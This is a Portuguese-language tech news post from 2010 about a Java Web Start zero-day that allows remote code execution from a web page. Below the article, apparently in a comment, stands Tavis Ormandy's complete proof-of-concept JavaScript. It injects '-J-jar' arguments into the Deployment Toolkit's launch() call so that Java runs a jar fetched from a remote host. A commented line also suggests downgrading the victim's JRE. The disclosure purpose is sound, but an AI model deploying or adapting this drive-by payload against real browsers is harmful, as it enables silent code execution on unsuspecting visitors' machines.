Vulnerabilidade no Java permite execução indevida de código
Enviado por André Machado (andreferreiramachadoΘgmail·com):
“Detalhes de uma vulnerabilidade dia-zero no Java foram publicados no dia 9 de Abril por Tavis Ormandy, um engenheiro de Segurança da Informação do Google. “A vulnerabilidade permite a um atacante executar código remoto na máquina alvo e pode ser disparada ao visitar-se uma simples página da Web”, disse Wolfgang Kandek, CTO da Qualys: “Ela está localizada no componente Java Web Start e está presente no java rodando nos sistemas Windows”. Uma análise técnica posterior revelou que sistemas Linux também são afetados
Acredita-se que todas as versões desde o Java 6 Update 10 sejam afetadas. Uma correção ainda não está disponível, mas Ormandy sugere muitos workarounds. Ele também diz que a Sun foi informada da falha mas não a considerou séria o suficiente para emitir uma correção fora de seu ciclo mensal.” [referência: keepgeek.com.br]
• Publicado por Augusto Campos em
2010-04-12
Java Deployment Toolkit Test Page
// Tavis Ormandy , April 2010
var u = “http: -J-jar -J\\lock.cmpxchg8b.com\calc.jar none”;
if (window.navigator.appName == “Microsoft Internet Explorer”) {
var o = document.createElement(“OBJECT”);
o.classid = “clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA”;
// Trigger the bug
o.launch(u);
} else {
// Mozilla
var o = document.createElement(“OBJECT”);
var n = document.createElement(“OBJECT”);
o.type = “application/npruntime-scriptable-plugin;deploymenttoolkit”;
n.type = “application/java-deployment-toolkit”;
document.body.appendChild(o);
document.body.appendChild(n);
// Test both MIME types
try {
// Old type
o.launch(u);
} catch (e) {
// New type
n.launch(u);
}
}
// Bonus Vulnerability, why not downgrade victim to a JRE vulnerable to
// this classic exploit?
// http://sunsolve.sun.com/search/document.do?assetkey=1-66-244991-1
// o.installJRE(“1.4.2_18″);
O jeito é desabilitar o java no browser, que vai rodar mais rápido.
Alguém vai chorar por causa disso?